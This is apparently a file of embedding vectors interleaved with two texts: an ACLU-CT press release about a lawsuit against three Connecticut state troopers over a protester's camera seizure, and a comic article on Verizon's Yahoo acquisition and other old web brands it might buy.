[ -0.023046106100082397, -0.011674640700221062, 0.005051180254667997, -0.03748420998454094, -0.009789478033781052, -0.02699865959584713, -0.01894410513341427, 0.022306932136416435, 0.036954544484615326, -0.05042155086994171, -0.035966306924819946, 0.02117924578487873, 0.10558147728443146, 0.01731949858367443, -0.04095662012696266, 0.03971570357680321, -0.03662488982081413, -0.0325041227042675, -0.066059410572052, -0.06527247279882431, -0.12622714042663574, -0.11044801771640778, 0.01540013775229454, -0.032248884439468384, 0.029988357797265053, -0.008797606453299522, 0.009800804778933525, -0.054702118039131165, -0.08225303143262863, -0.002839901251718402, -0.004202517215162516, -0.05117129907011986, -0.023029034957289696, 0.030017493292689323, 0.02294972538948059, 0.0446554459631443, 0.04623746871948242, 0.08879078924655914, -0.016596943140029907, -0.01197213213890791, 0.06405922770500183, -0.04750407859683037, 0.014417196623980999, -0.003511716378852725, -0.03477060794830322, -0.007682292256504297, -0.0018027997575700283, 0.002111081499606371, -0.1089191883802414, -0.053556039929389954, -0.10172057896852493, -0.1196720078587532, 0.037599705159664154, 0.007723853923380375, 0.0933462381362915, 0.09968509525060654, 0.06985499709844589, -0.02370595373213291, -0.0062871756963431835, 0.04202170670032501, -0.005827539600431919, 0.016521599143743515, -0.09693911671638489, -0.023195777088403702, -0.025998404249548912, -0.007551238406449556, -0.045158643275499344, 0.06821916252374649, -0.020361101254820824, 0.0593462772667408, 0.07459919899702072, -0.06345437467098236, 0.0035448698326945305, 0.003033422166481614, 0.017629429697990417, 0.044337138533592224, 0.044797010719776154, -0.015570132061839104, 0.07331334799528122, 0.06437929719686508, 0.011928006075322628, -0.01220208965241909, -0.05430079624056816, 0.013385023921728134, 0.013090038672089577, -0.030542943626642227, -0.04883696883916855, -0.0494813397526741, 0.0568782277405262, 0.1128692477941513, -0.04867231845855713, 0.03863706812262535, -0.016286930069327354, -0.02450699172914028, 0.07872410118579865, 0.1032550111413002, 0.01633417420089245, -0.014659715816378593, -0.007346972823143005, 0.031944260001182556, -0.04724617302417755, -0.007345221005380154, -0.03769514337182045, -0.0431431345641613, -0.010530801489949226, 0.09661588072776794, -0.030778935179114342, 0.07189387083053589, 0.06175869330763817, 0.0210365392267704, -0.04319467768073082, -0.008573471568524837, -0.04480167105793953, 0.025614917278289795, 0.05823947861790657, -0.02059079520404339, -0.002031082985922694, 0.06644684821367264, -0.008700096979737282, 0.01144691463559866, -0.008308036252856255, 0.07325054705142975, 0.08150739222764969, -0.057803262025117874, -0.014293701387941837, 0.02963651344180107, -0.12079474329948425, 2.237903757372571e-33, 0.021570075303316116, 0.08499087393283844, -0.010953319258987904, 0.07580967992544174, -0.07480192184448242, -0.028904860839247704, -0.049229271709918976, -0.0019412870751693845, -0.04831307753920555, -0.05052239075303078, -0.012422910891473293, 0.060542162507772446, 0.026670746505260468, 0.0022459933534264565, -0.020568417385220528, -0.011086288839578629, 0.08204784989356995, -0.023592554032802582, -0.0326853021979332, -0.03863959014415741, 0.015810208395123482, 0.0016626379219815135, -0.0154930604621768, 0.01574825681746006, 0.06995117664337158, -0.03571566939353943, -0.056079331785440445, 0.0047721234150230885, 0.07218864560127258, 0.011113535612821579, -0.0006263664690777659, -0.05079302191734314, -0.023615136742591858, -0.045451994985342026, -0.0167981144040823, 0.035647716373205185, -0.042744435369968414, -0.09701163321733475, 0.03419983759522438, -0.05410967394709587, -0.08567054569721222, 0.012809542939066887, 0.02236875705420971, -0.0038046701811254025, -0.003013305366039276, 0.08423474431037903, 0.0393037274479866, 0.0007114570471458137, -0.07954941689968109, 0.043519411236047745, -0.061202459037303925, 0.02071116864681244, 0.07051399350166321, 0.009784157387912273, -0.002597394399344921, -0.020173972472548485, 0.02924744039773941, 0.09293903410434723, 0.022409366443753242, -0.061825890094041824, 0.02618008852005005, -0.010628105141222477, -0.05126132816076279, 0.06361205130815506, 0.07123550772666931, -0.05582291632890701, -0.03975502774119377, -0.0017357090255245566, 0.03628808259963989, 0.012686959467828274, 0.015517715364694595, 0.06010235846042633, -0.08973607420921326, -0.04796783626079559, -0.01813480816781521, -0.05709708109498024, -0.026431186124682426, 0.03579527139663696, 0.00941460020840168, -0.002128832507878542, -0.04495566710829735, 0.046730246394872665, 0.014532307162880898, 0.02251669578254223, 0.022506486624479294, -0.01372983306646347, 0.03416895493865013, -0.04456297680735588, 0.05090204253792763, 0.11867300420999527, -0.013217699714004993, -0.07333013415336609, -0.01974775269627571, 0.09699640423059464, -0.053048815578222275, -3.0748428781885774e-33, 0.07904017716646194, -0.05469696223735809, 0.1321297138929367, 0.004467125982046127, 0.16280731558799744, -0.06274162977933884, -0.05505572631955147, -0.05786706134676933, -0.023778894916176796, -0.04370815306901932, 0.04744589328765869, 0.0033107339404523373, -0.028023673221468925, -0.013148671947419643, 0.024333171546459198, -0.08793209493160248, -0.004258166067302227, 0.0041862488724291325, 0.0500357486307621, -0.07888779044151306, 0.11816105246543884, 0.02904646471142769, -0.04310397803783417, 0.05514785647392273, 0.022193102166056633, -0.02680722251534462, 0.019767872989177704, -0.0055815367959439754, -0.05420419201254845, 0.05341295152902603, -0.004768738057464361, 0.05399981513619423, 0.041075967252254486, 0.002102689817547798, -0.027509938925504684, 0.14857088029384613, 0.0026606067549437284, -0.0861181914806366, 0.01589401625096798, 0.014052961021661758, -0.00007836837903596461, 0.026403775438666344, -0.037023212760686874, -0.10637424886226654, -0.02283048816025257, 0.05625428259372711, 0.025686362758278847, 0.0025529630947858095, -0.035744842141866684, -0.049251455813646317, 0.01608678512275219, 0.04336937516927719, -0.020062902942299843, -0.013248075731098652, 0.0102761872112751, -0.0062198457308113575, 0.08657129108905792, 0.02062341757118702, 0.05894257128238678, 0.0051325177773833275, 0.03808191418647766, -0.048310622572898865, -0.030736226588487625, 0.04080976918339729, -0.05382508039474487, -0.06264986842870712, 0.05795058608055115, 0.030759086832404137, -0.1066257581114769, 0.03705459088087082, -0.009527025744318962, -0.022776007652282715, -0.03361952677369118, 0.05235724523663521, -0.0663587674498558, 0.008664924651384354, -0.0388871505856514, -0.04537784308195114, -0.03873727470636368, -0.04534284397959709, -0.09981755912303925, -0.013487184420228004, 0.036454182118177414, -0.037249818444252014, 0.13964295387268066, 0.07707951962947845, 0.05825814604759216, 0.03709173575043678, 0.01888953521847725, -0.04230962321162224, 0.015487614087760448, -0.1446208506822586, 0.031040292233228683, -0.031007081270217896, -0.07156521826982498, -6.105975103309902e-8, -0.02677862159907818, 0.0322505347430706, -0.03805197402834892, 0.05689600110054016, 0.01308877021074295, 0.043439917266368866, -0.00856731366366148, -0.01549188606441021, 0.037084076553583145, 0.044726625084877014, 0.03983369097113609, -0.05323507636785507, -0.058015089482069016, 0.03540348261594772, 0.09488024562597275, -0.018379734829068184, -0.05570031702518463, -0.035346418619155884, -0.03267797827720642, -0.025513917207717896, 0.011129790917038918, 0.04447522759437561, -0.10715965926647186, 0.05427581071853638, 0.022989951074123383, -0.04695196822285652, -0.05060786381363869, 0.12886685132980347, -0.04657149314880371, 0.024010073393583298, -0.05157332494854927, -0.007842574268579483, 0.005994453560560942, -0.05970708653330803, 0.023216085508465767, 0.04319737106561661, -0.032129235565662384, -0.05516870319843292, -0.013481594622135162, 0.08057273924350739, -0.0010619463864713907, -0.006518524140119553, 0.02570330537855625, 0.0020731347613036633, 0.01928303949534893, 0.08444973826408386, 0.011294115334749222, 0.05755440518260002, 0.01885606348514557, -0.007101228926330805, -0.0006644724635407329, -0.01988113671541214, 0.01668532006442547, -0.11675228178501129, 0.013457445427775383, 0.02089746668934822, 0.05475226789712906, 0.04661346971988678, -0.014803162775933743, -0.029809370636940002, 0.11859173327684402, -0.07400403171777725, -0.044285740703344345, -0.05514538660645485 ]
Suit stems from West Hartford incident caught on video camera HARTFORD — In a complaint filed today in the U.S. District Court for the District of Connecticut, the American Civil Liberties Union of Connecticut (ACLU-CT) contends that three state police troopers illegally retaliated against a protester by searching and detaining him, confiscating his camera, and charging him with fabricated criminal infractions. On behalf of Connecticut resident Michael Picard, the ACLU-CT alleges that John Barone, Patrick Torneo, and John Jacobi, all employed by the state police division of Connecticut’s Department of Emergency Services and Public Protection, violated Picard’s First Amendment rights to free speech and information and Fourth Amendment right against warrantless seizure of his property. On September 11, 2015, Picard was protesting near a police DUI checkpoint in West Hartford. Barone approached him under the pretext of public complaints and confiscated Picard’s legally-carried pistol and pistol permit. Barone then claimed that filming the police is illegal, and took Picard’s camera. Unbeknownst to the troopers, the camera was recording when Barone brought it to Torneo’s cruiser. With the camera rolling, the officers proceeded to: call a Hartford police officer to see if he or she had any “grudges” against Picard; open an investigation of him in the police database; and discuss a separate protest that he had organized at the state capitol. After Barone announced “we gotta cover our ass,” either Torneo or Jacobi stated “let’s give him something,” and the three settled on fabricating two criminal infraction tickets that they issued to Picard. Torneo drove away with Picard’s camera on top of his cruiser, upon which the camera fell onto the hood of the car, Torneo stopped, and Jacobi returned the camera to Picard. In July of this year, the criminal charges against Picard were dismissed in the Connecticut Superior Court. “Police should be focused on public safety, not punishing protesters and those who film public employees working on a public street,” said ACLU-CT legal director Dan Barrett, who is representing Picard in the lawsuit. “As the video shows, these police officers were more concerned with thwarting Mr. Picard’s free speech and covering their tracks than upholding the law.” “Community members like me have a right to film government officials doing their jobs in public, and we should be able to protest without fearing political retribution from law enforcement,” said Picard. “As an advocate for free speech, I’m deeply disappointed that these police officers ignored my rights, particularly because two of the troopers involved were supervisors who should be setting an example for others. By seeking to hold these three police officers accountable, I hope that I can prevent the same thing from happening to someone else.” “The evidence clearly shows that these police officers violated Mr. Picard’s rights,” said attorney Joseph R. Sastre, who defended Picard against the criminal charges and is joining Barrett to represent Picard in the civil case. “We are confident that the court will agree, and we hope that it will send a strong message to police and the public alike that enforcing the law means respecting free speech, not trampling on it.” The complaint filed in U.S. District Court is available below. For more information about your right to record police in Connecticut, download our pocket guide, included below.
[ -0.10129254311323166, 0.07405085861682892, -0.032017674297094345, -0.06634341925382614, 0.06141413003206253, 0.0445498488843441, 0.057710789144039154, 0.02485634945333004, -0.039887383580207825, 0.08335451781749725, 0.13234396278858185, 0.08277985453605652, 0.010918946005403996, 0.03999357670545578, 0.012939587235450745, 0.0012049226788803935, 0.037807051092386246, 0.029824357479810715, -0.11461703479290009, 0.07617098838090897, 0.021008258685469627, -0.022866515442728996, 0.0359395295381546, 0.021962368860840797, -0.0577334463596344, 0.03596118092536926, 0.017352811992168427, -0.000563601148314774, -0.03780706599354744, 0.0069710020907223225, -0.05106174945831299, -0.05371105670928955, -0.013214562088251114, 0.0909176766872406, 0.07046835869550705, -0.04741731286048889, 0.05631636455655098, -0.044736430048942566, 0.040367912501096725, 0.025920458137989044, 0.038018643856048584, -0.014298773370683193, 0.006748121697455645, 0.032992612570524216, -0.010456670075654984, 0.03154250979423523, 0.04368506744503975, 0.0686102956533432, 0.04434029012918472, 0.020291311666369438, -0.008993557654321194, 0.05883757025003433, 0.012755084782838821, -0.06570098549127579, -0.06492611020803452, -0.0829763114452362, 0.01092922780662775, 0.04798209294676781, 0.058097973465919495, 0.037199508398771286, -0.04531592130661011, -0.0012605050578713417, 0.012758243829011917, 0.012746033258736134, -0.013110106810927391, 0.0004116533091291785, -0.04378320276737213, -0.004421174060553312, 0.05035943537950516, -0.024492552503943443, 0.06877780705690384, 0.06745874136686325, 0.0089094378054142, -0.023348426446318626, -0.05174136534333229, -0.04603422060608864, 0.012186911888420582, 0.014980796724557877, 0.0050605423748493195, -0.0513334795832634, 0.14320245385169983, -0.10132641345262527, -0.04059286043047905, -0.007109447848051786, 0.1085314080119133, -0.050454702228307724, -0.03305494785308838, 0.03977566957473755, 0.07815711945295334, -0.004591143690049648, -0.05233701691031456, 0.004107001703232527, -0.03724218159914017, -0.10747181624174118, 0.034552961587905884, -0.08068852126598358, -0.0107877803966403, -0.022358572110533714, -0.03816189616918564, 0.037258975207805634, 0.06560222059488297, -0.0069330064579844475, 0.0019457867601886392, -0.007981227710843086, 0.05107840895652771, -0.03467778488993645, 0.009369590319693089, -0.03927507996559143, -0.029351573437452316, 0.04603142663836479, 0.00949451420456171, 0.03448710963129997, 0.006907016504555941, -0.048519592732191086, 0.11297114938497543, -0.013252129778265953, -0.05965302139520645, 0.08486629277467728, -0.027943292632699013, -0.09940608590841293, -0.0068810502998530865, 0.008953763172030449, -0.08062945306301117, 0.04595126211643219, 0.05401769280433655, -0.015488539822399616, 0.01521148532629013, 2.7788203398729086e-33, 0.0294464360922575, 0.04261133819818497, -0.04607512429356575, 0.037298452109098434, 0.054115839302539825, 0.012256945483386517, -0.037739407271146774, -0.0041091563180089, 0.03278360143303871, 0.052182432264089584, 0.020076865330338478, -0.05598330870270729, 0.039724256843328476, -0.028521984815597534, -0.028730643913149834, 0.028557397425174713, -0.0020686734933406115, 0.016422590240836143, -0.02771449089050293, 0.02087274007499218, 0.0015350541798397899, -0.026595965027809143, 0.028861360624432564, 0.08693814277648926, -0.11907942593097687, -0.02883042022585869, 0.010183167643845081, 0.003689724951982498, 0.025361234322190285, -0.029586918652057648, -0.05921709164977074, 0.13978137075901031, 0.06667403131723404, 0.10281208157539368, 0.1861109882593155, -0.0321907214820385, 0.0005287741078063846, -0.03900478780269623, -0.019768185913562775, 0.014401717111468315, -0.03626075014472008, 0.03375900164246559, 0.02985517308115959, -0.04947252944111824, -0.0005108247860334814, -0.07321686297655106, -0.07178294658660889, -0.03084643930196762, -0.0558575764298439, 0.004223128780722618, 0.09299858659505844, 0.04296412318944931, -0.03276357799768448, -0.03578316420316696, -0.0869477242231369, 0.03142409771680832, -0.07143556326627731, -0.016256369650363922, 0.08074989914894104, -0.004470497369766235, 0.027077145874500275, 0.14460662007331848, -0.028091398999094963, -0.016364071518182755, -0.08152563869953156, -0.05772385001182556, -0.07646949589252472, 0.023867757990956306, 0.06802184134721756, 0.01981702260673046, 0.08617410808801651, 0.01830131933093071, 0.0058937035501003265, -0.03765182942152023, 0.05218251794576645, 0.041232191026210785, -0.015475006774067879, 0.07008790969848633, -0.02605648897588253, -0.05635007843375206, -0.06739094853401184, -0.03151663392782211, 0.08146495372056961, 0.027846090495586395, -0.0222026240080595, -0.06123675778508186, 0.025732552632689476, -0.022636383771896362, -0.012334685772657394, -0.012720424681901932, 0.009082633070647717, -0.008448782376945019, -0.017074741423130035, -0.00535363145172596, -0.022497553378343582, -4.101937495704282e-33, -0.04184319078922272, -0.025002997368574142, -0.022546356543898582, -0.053199585527181625, -0.06751158833503723, -0.12961824238300323, -0.03646916523575783, -0.015592521987855434, 0.0788164883852005, -0.06502464413642883, -0.02838907018303871, -0.08479396253824234, -0.06397250294685364, 0.03546819090843201, 0.01950525864958763, 0.033390820026397705, 0.02548111602663994, -0.028996044769883156, -0.07862647622823715, 0.01152588240802288, 0.041156280785799026, -0.059768665581941605, 0.041632067412137985, 0.07096827775239944, -0.007754825055599213, 0.004919482860714197, 0.0606752373278141, -0.04247910529375076, 0.12212129682302475, -0.03576952591538429, 0.012386211194097996, 0.02307742089033127, -0.011160612106323242, -0.017520831897854805, -0.023265060037374496, 0.01639699749648571, 0.10823430866003036, 0.02763134427368641, -0.032816339284181595, 0.026628384366631508, 0.06805306673049927, 0.02589602954685688, -0.01742519624531269, 0.051573559641838074, -0.06597372889518738, -0.04052657261490822, 0.04315332695841789, -0.020720599219202995, -0.07669129967689514, 0.010503428056836128, -0.0334378220140934, 0.003578850533813238, 0.03808898106217384, 0.00948505662381649, -0.018817147240042686, -0.02601844072341919, -0.013479423709213734, -0.03076576441526413, -0.07052649557590485, -0.013740714639425278, 0.07177525758743286, 0.03825532644987106, -0.14668889343738556, -0.05782550573348999, 0.02760126069188118, -0.017030887305736542, -0.045145850628614426, -0.014476229436695576, -0.032037097960710526, 0.005590567830950022, 0.03111409954726696, -0.03381871432065964, 0.02249968983232975, -0.04380571469664574, 0.09511763602495193, -0.05322745814919472, -0.018816396594047546, 0.06660330295562744, -0.019530441612005234, 0.0431148000061512, 0.015329170972108841, -0.1500464528799057, -0.073062963783741, 0.046481505036354065, -0.012700797989964485, 0.01312469132244587, 0.05572092533111572, -0.11584318429231644, -0.01894410327076912, -0.01313209068030119, 0.009508422575891018, -0.027358876541256905, 0.042012255638837814, 0.10283676534891129, 0.0074768513441085815, -4.86057238902049e-8, -0.07706808298826218, 0.04688926786184311, -0.09503328800201416, -0.01036260649561882, 0.012453053146600723, -0.004761458374559879, -0.0003009675710927695, 0.019606685265898705, 0.024760538712143898, -0.07432758063077927, 0.0204490814357996, 0.01863294094800949, -0.012529856525361538, -0.07750414311885834, -0.0588635616004467, 0.02587779425084591, -0.011039110831916332, -0.10103493183851242, 0.01872216910123825, 0.04691200330853462, -0.06264206767082214, -0.024922534823417664, -0.07402665168046951, 0.009968200698494911, -0.07412806153297424, 0.014130142517387867, -0.006808719132095575, -0.05718020722270012, -0.0009025039616972208, 0.06294967234134674, -0.07242590934038162, 0.022468730807304382, 0.0002772326406557113, -0.06251826137304306, 0.023939408361911774, -0.05723703280091286, 0.03143293410539627, -0.010006505064666271, 0.056686073541641235, -0.06543031334877014, -0.025185033679008484, 0.06270507723093033, 0.018539926037192345, 0.03515616059303284, 0.08381534367799759, 0.0012625698000192642, 0.04948361963033676, -0.05653576925396919, 0.005857886280864477, -0.034988321363925934, -0.03155622258782387, -0.015107293613255024, -0.02058296836912632, 0.06257486343383789, 0.04616031423211098, -0.038491666316986084, 0.08916938304901123, -0.04363161325454712, -0.034907907247543335, 0.018577802926301956, -0.016841499134898186, 0.029616940766572952, 0.012325694784522057, 0.02228361926972866 ]
In the second season of BoJack Horseman, it’s revealed that the pop culture magazine Manatee Fair (get it?) is owned by a sprawling media conglomerate called AOL–Time Warner–PepsiCo-Viacom-Halliburton-Skynet-Toyota–Trader Joe’s. In the real world, this company goes by a simpler name: Verizon. The wireless carrier was the winner in the contest to finally put Yahoo out of its misery, acquiring the fading internet giant for $4.8 billion. On the one hand, paying billions of dollars for Yahoo in 2016 sounds about as forward-looking as buying AOL for $4.4 billion (which Verizon also did, but we’ll get to that). The only person who still uses Yahoo email is your mom because you set up an account for her in 2002, right? Yahoo Answers is an elaborate piece of performance art about the amorphous nature of truth in the digital age, right? GeoCities died off two Web-point-0s ago … right? Actually, for all its failings, Yahoo is still one of the biggest internet companies in the world, a member of the vaunted billion-user club with Facebook and Google (though Yahoo’s billion-user claim is a bit of a cheat as it cobbles together users of a variety of products). Yahoo.com attracts more visitors than Wikipedia, Twitter, and Reddit, according to Alexa. The company also claims 600 million mobile monthly users. That level of scale is highly enticing to Verizon, which in recent years has made a Bold Pivot to create Compelling Internet Content for the Mobile-First Generation (here is a strange list of properties Verizon now at least partially owns: The Huffington Post, Complex Media, Millennial Media, TechCrunch, Tumblr, AwesomenessTV, Flickr, Rivals.com, Katie Couric). With smartphone adoption reaching a saturation point in the United States and pay-TV growth screeching to a halt, the telco giant is looking for new revenue sources. And there’s pretty much no better way to create the illusion of growth in 2016 than by publishing ungodly amounts of Content. With Yahoo (theoretically) continuing to attract a massive number of eyeballs, Verizon will make money on those visitors thanks to its purchase of AOL and a soul-crushing invention called “programmatic ad-buying technology.” Basically, AOL gives Verizon the ability to serve lots and lots of targeted ads on lots and lots of web pages. Like Spirited Away’s No-Face, there may be no satiating the telco now that it’s gotten a taste for Content — ’90s Content, in particular. So, what’s Verizon going to snatch up for its Web 1.0 revolution next? IAC/Interactive Corp The media company has been collecting early-web flotsam for the better part of a decade. IAC bought the search engine Ask Jeeves (now Ask.com) for $1.85 billion in 2005. Later, it spent $300 million on About.com, the world’s most popular website for halfheartedly researching New Year’s resolutions. Acquiring two stalwart ’90s relics with a single acquisition would be a boon — Verizon would be like the kid who got Pokémon Red and Pokémon Blue for Christmas ’98. In addition to precious Content, this deal would give Verizon ownership of Tinder, OkCupid, and Match.com, which (prepare for disillusionment) are all owned by IAC. It’s not totally clear how much synergy could be built among dating apps and Verizon’s other properties, but where there’s a corporate will, there’s a way — maybe serve up HuffPo dating tips after a user strikes out on a dozen right swipes. Cost: IAC’s market cap is $4.8 billion, so we’ll round up to a cool $5 billion. MapQuest Of the hundreds of companies felled by Google’s ascendance, MapQuest is one of the easiest to root for. The company began as a Chicago-based cartography firm in the 1960s that issued free maps at gas stations, and later launched the free online service MapQuest in 1996. In its heyday, MapQuest was one of the most useful services online, reducing the psychological warfare waged between road trip drivers and navigators by at least half. A modernized, mobile MapQuest could be a useful place for Verizon to sell location-based ads. Cost: Free! AOL actually bought MapQuest for $1.1 billion in 2000, which means Verizon acquired it during last year’s AOL acquisition. Chances are the service has been relegated to the same junk drawer as AOL’s dial-up internet customers, though, so Verizon could dust the brand off and give a solid go of competing with Google and Apple. Legacy.com We all know that the digital world revolves around the coveted 18-to-34 demographic, but there are plenty of other age groups out there waiting to be monetized. Enter Legacy.com. The obituary website attracts 40 million visitors worldwide per month to read dedications for both loved ones and celebrities like Muhammad Ali. Verizon owning an obituary service is no more or less arbitrary than Verizon now owning Rivals.com. So why not? We here at The Ringer are already prepared to license one timely obit to the website. Cost: Bloomberg reports Legacy.com’s annual revenue at as much as $100 million, so somewhere north of that. Neopets Internet denizens of a certain age have all had this stray thought at some point or another, which they are careful to never probe too deeply: Why the fuck was I so into Neopoets for like two months? The website, launched in 1999, allowed kids to raise virtual pets and earn digital currency by playing ad-heavy Flash games. There wasn’t much of a point to it besides the satisfaction of seeing a make-believe animal on a screen feign happiness. Maybe Neopets is what primed us to get a dopamine rush from Facebook likes. If Pokémon Go is any indication, millennials are more than willing to grab hold of any nostalgic life raft in a sea of political and social upheaval. Put the Neopets in a catch-’em-all augmented-reality game. Give them a YouTube show. Infiltrate the tween networks on Tumblr and pass the game off as the new, hip thing. The animals are cuddly, addictive, and faintly unsettling, which makes them perfectly primed for a 2016 resurgence. Cost: Our last hope of remaining socially and politically engaged in these trying times.
[ -0.06322140246629715, -0.09019987285137177, 0.06120859831571579, -0.05007177218794823, 0.04311585798859596, -0.0787201002240181, 0.07838989049196243, -0.011977151036262512, 0.09599608927965164, -0.05509496107697487, 0.02216477133333683, 0.11031558364629745, -0.011207408271729946, 0.044294435530900955, 0.025800688192248344, 0.02164657600224018, 0.019599009305238724, -0.1292908787727356, -0.0072510456666350365, 0.034728020429611206, -0.10328555107116699, -0.02450835518538952, 0.04477228224277496, 0.021380461752414703, 0.009380241855978966, -0.04330980032682419, -0.05953671410679817, -0.0005328788538463414, -0.08332934230566025, -0.030421407893300056, 0.033384911715984344, 0.008719313889741898, 0.07950817793607712, 0.06299065053462982, -0.07615967094898224, -0.08221273124217987, -0.025707069784402847, 0.017804758623242378, 0.004035049583762884, -0.008727505803108215, -0.0010075255995616317, -0.08772619068622589, -0.04280757158994675, -0.04905444756150246, 0.008827833458781242, 0.006804446689784527, 0.02125050500035286, 0.04073113575577736, -0.03262685611844063, 0.06514231860637665, 0.025674160569906235, -0.05986454337835312, 0.026241237297654152, 0.01056702807545662, 0.04351804405450821, 0.0475178137421608, -0.04343442618846893, 0.02110789157450199, -0.0020253127440810204, 0.09960499405860901, -0.003004865488037467, 0.0192246176302433, -0.013946187682449818, 0.04231666401028633, -0.04313591495156288, -0.05714445188641548, 0.03415875881910324, 0.02715890109539032, -0.0692720040678978, -0.058145035058259964, 0.05802218243479729, 0.005941157694905996, 0.003054459812119603, 0.12012080103158951, 0.007997013628482819, 0.03673553839325905, 0.10654555261135101, 0.03744617477059364, 0.08463378250598907, 0.07916946709156036, -0.0024076951667666435, -0.024099119007587433, 0.003922806587070227, 0.02576584741473198, -0.018330007791519165, 0.005430441349744797, 0.002612014301121235, 0.031201383098959923, 0.00746774161234498, -0.010587269440293312, -0.027192583307623863, 0.029588300734758377, 0.0018375769723206758, 0.012214940041303635, 0.03202882036566734, 0.009237036108970642, -0.014707923866808414, -0.016490137204527855, -0.044891368597745895, 0.01905587874352932, 0.03493901714682579, 0.09319441020488739, 0.06271286308765411, -0.09485515207052231, 0.053236328065395355, -0.03080175258219242, 0.03358834236860275, 0.10450670123100281, 0.08190284669399261, 0.049035780131816864, -0.020556334406137466, -0.039734359830617905, 0.05392921343445778, 0.020581720396876335, -0.0009441320435144007, -0.018124999478459358, -0.11710652709007263, 0.0699516013264656, 0.08824793249368668, -0.06817436218261719, -0.006959802005439997, 0.10379314422607422, 0.0053554619662463665, -0.00020584322919603437, 0.021841270849108696, 0.013817604631185532, -0.0737353190779686, 3.749870325477284e-33, 0.0414753220975399, 0.08753062784671783, -0.025620777159929276, -0.017866019159555435, -0.05481204017996788, 0.07822183519601822, 0.01759202405810356, 0.11016150563955307, -0.07759410887956619, 0.022299999371170998, -0.039260126650333405, 0.01951315440237522, -0.022959155961871147, -0.03021620213985443, 0.10113578289747238, -0.024242911487817764, -0.060574740171432495, -0.03412492200732231, 0.10755905508995056, -0.057833701372146606, 0.03219537064433098, 0.03138444200158119, 0.0155863706022501, -0.013154668733477592, -0.012022576294839382, -0.056152667850255966, -0.021132195368409157, 0.02685912884771824, 0.021623170003294945, 0.03946366533637047, -0.027485312893986702, -0.053890783339738846, -0.035257428884506226, 0.04203486815094948, 0.06198183447122574, -0.002357545541599393, 0.02421848103404045, -0.06901679188013077, -0.03747095540165901, 0.03875954821705818, -0.03838882967829704, 0.07182445377111435, -0.12224073708057404, 0.06049307435750961, -0.06125099956989288, 0.044744037091732025, 0.006782849319279194, -0.0211123526096344, 0.053838931024074554, 0.03795160725712776, -0.025917604565620422, -0.023027773946523666, -0.05226314812898636, 0.006490123458206654, -0.008170755580067635, 0.04382096230983734, -0.030731908977031708, 0.003228172892704606, 0.05482364073395729, -0.022822057828307152, -0.056577932089567184, -0.0074449870735406876, 0.004651975817978382, 0.010113369673490524, -0.030029505491256714, -0.004309372510761023, 0.05754995718598366, -0.02671101503074169, -0.11475012451410294, 0.0741787776350975, 0.12667407095432281, -0.07130125910043716, -0.03535696864128113, -0.05186844617128372, -0.04368358477950096, 0.017877506092190742, 0.020439254119992256, 0.042540859431028366, 0.00968746654689312, 0.010595778003334999, 0.09199059754610062, 0.056904032826423645, 0.12041220813989639, 0.008618630468845367, 0.005917207337915897, -0.017383785918354988, 0.10419020056724548, 0.030182644724845886, -0.0011425954289734364, 0.07192999124526978, -0.039116621017456055, -0.004238405730575323, -0.01650712639093399, 0.059235118329524994, -0.014178219251334667, -3.0300921755947576e-33, -0.14633949100971222, -0.0581400990486145, 0.011441731825470924, -0.030220918357372284, -0.06726516038179398, -0.09543590247631073, 0.002870903117582202, 0.06031953915953636, 0.0058170221745967865, -0.013761838898062706, -0.06820672005414963, -0.018927013501524925, -0.0023667882196605206, 0.01917911507189274, -0.0025797039270401, -0.024605732411146164, -0.00170459458604455, -0.13859449326992035, -0.08717767149209976, -0.026569530367851257, -0.02874218113720417, 0.006346279289573431, -0.027574539184570312, 0.05400703847408295, 0.0043294718489050865, 0.003978830762207508, 0.010466938838362694, 0.00952086690813303, -0.018392477184534073, 0.006090403068810701, 0.06084375083446503, -0.052137505263090134, 0.014258166775107384, 0.001011776621453464, 0.009037635289132595, 0.021008118987083435, -0.02301213890314102, -0.02767140045762062, -0.019067635759711266, -0.0716579407453537, 0.0467868410050869, 0.008652652613818645, -0.04138456657528877, 0.03087712451815605, -0.030387084931135178, 0.027956586331129074, -0.030893558636307716, -0.05636060610413551, 0.0000620530336163938, -0.0027437813114374876, -0.004347873851656914, -0.07885091751813889, 0.10123489797115326, -0.011780129745602608, -0.06369911879301071, 0.013322343118488789, 0.008454783819615841, 0.044599998742341995, 0.0016925032250583172, -0.05124928802251816, -0.03224076330661774, 0.003075371263548732, -0.011543977074325085, 0.016652792692184448, 0.0034972780849784613, -0.008526235818862915, 0.07130908966064453, 0.034741032868623734, -0.07245061546564102, -0.042098622769117355, 0.01679442636668682, -0.03573950380086899, -0.06517644971609116, -0.07995583862066269, -0.02217801660299301, 0.08235407620668411, 0.016223909333348274, 0.05160355567932129, -0.07973719388246536, 0.004042584449052811, 0.09928843379020691, 0.09638820588588715, 0.0505114383995533, -0.06135385483503342, 0.001394686521962285, -0.04628092423081398, 0.014371092431247234, -0.012276063673198223, -0.08121968060731888, 0.024589963257312775, 0.04168593883514404, -0.04670124873518944, -0.1028979942202568, 0.09361721575260162, 0.005773740820586681, -5.58976402942335e-8, -0.05631110817193985, 0.015834707766771317, 0.013816081918776035, 0.08059020340442657, 0.10648602247238159, -0.017739243805408478, 0.06557149440050125, 0.06557045876979828, 0.05527719482779503, 0.04575519263744354, -0.04338241368532181, 0.032413192093372345, -0.07870347797870636, 0.047349777072668076, 0.042394932359457016, -0.02095489390194416, -0.0644746944308281, -0.0513298436999321, 0.016534114256501198, 0.025131313130259514, 0.038167934864759445, 0.033567801117897034, 0.00443639513105154, -0.036185797303915024, 0.015504008159041405, -0.021856196224689484, -0.03739973157644272, -0.023987747728824615, 0.008390232920646667, 0.005821400787681341, -0.07257195562124252, -0.018810737878084183, -0.07492106407880783, -0.03294755890965462, -0.06412679702043533, -0.059456005692481995, -0.05060836300253868, -0.06436290591955185, -0.0354725606739521, 0.035242434591054916, 0.04252879321575165, 0.03411523625254631, 0.05105426535010338, -0.020432965829968452, -0.01713736541569233, -0.017942724749445915, -0.10888559371232986, -0.001008296268992126, 0.10880333185195923, -0.03637957200407982, -0.04810953140258789, -0.010184195823967457, 0.05403967946767807, 0.02726772427558899, 0.011836777441203594, -0.15149030089378357, 0.02272055484354496, -0.010235299356281757, -0.024114174768328667, 0.006146416068077087, -0.004784854128956795, -0.09140489995479584, 0.06456219404935837, 0.02910955250263214 ]
